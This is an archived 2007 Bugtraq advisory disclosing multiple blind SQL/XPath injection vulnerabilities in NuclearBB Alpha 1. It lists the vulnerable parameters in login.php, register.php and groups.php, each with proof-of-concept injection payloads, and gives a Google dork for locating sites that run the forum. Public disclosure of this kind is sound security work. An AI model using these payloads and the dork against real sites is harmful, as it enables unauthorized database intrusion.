NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2007-04

NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

johnmartinelli.com
Date: Wed Apr 18 2007 - 14:16:26 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"

=============
String Inputs
=============

----------------------------
login.php - $_POST['submit']
----------------------------

username=xyz
password=passxyz
submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']
--------------------------------

username=xyzxyz.com
email=xyzxyz.com
pass1=passwordxyz
pass2=passwordxyz
website=xyzxyz.com"+and+"1"="0
location=xyzxyz.com
msn=xyzxyz.com
yahoo=xyzxyz.com
aol=xyzxyz.com
icq=xyzxyz.com
signature=xyzxyz.com
coppa_state=over
register_submit=Register

----------------------------
register.php - $_POST['aol']
----------------------------

username=xyzxyz.com
email=xyzxyz.com
pass1=xyzxyz.com
pass2=xyzxyz.com
website=xyzxyz.com
location=xyzxyz.com
msn=xyzxyz.com
yahoo=xyzxyz.com
aol=xyzxyz.com"+and+"1"="0
icq=xyzxyz.com
signature=xyzxyz.com
coppa_state=over
register_submit=Register

----------------------------------
register.php - $_POST['signature']
----------------------------------

username=xyzxyz.com
email=xyzxyz.com
pass1=xyzxyz.com
pass2=xyzxyz.com
website=xyzxyz.com
location=xyzxyz.com
msn=xyzxyz.com
yahoo=xyzxyz.com
aol=xyzxyz.com
icq=xyzxyz.com
signature=xyzxyz.com"+and+"1"="0
coppa_state=over
register_submit=Register

==============
Numeric Inputs
==============

-----------------------
groups.php - $_GET['g']
-----------------------

http://www.example.com/groups.php?g=1+and+1=0

------------------------------
register.php - $_POST['email']
------------------------------

username=xyzxyz.com
email=xyzxyz.com+and+1=0
pass1=xyzxyz.com
pass2=xyzxyz.com
website=xyzxyz.com
location=xyzxyz.com
msn=xyzxyz.com
yahoo=xyzxyz.com
aol=xyzxyz.com
icq=xyzxyz.com
signature=xyzxyz.com
coppa_state=over&register_submit=Register

John Martinelli
johnmartinelli.com
http://john-martinelli.com

April 18th, 2007

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]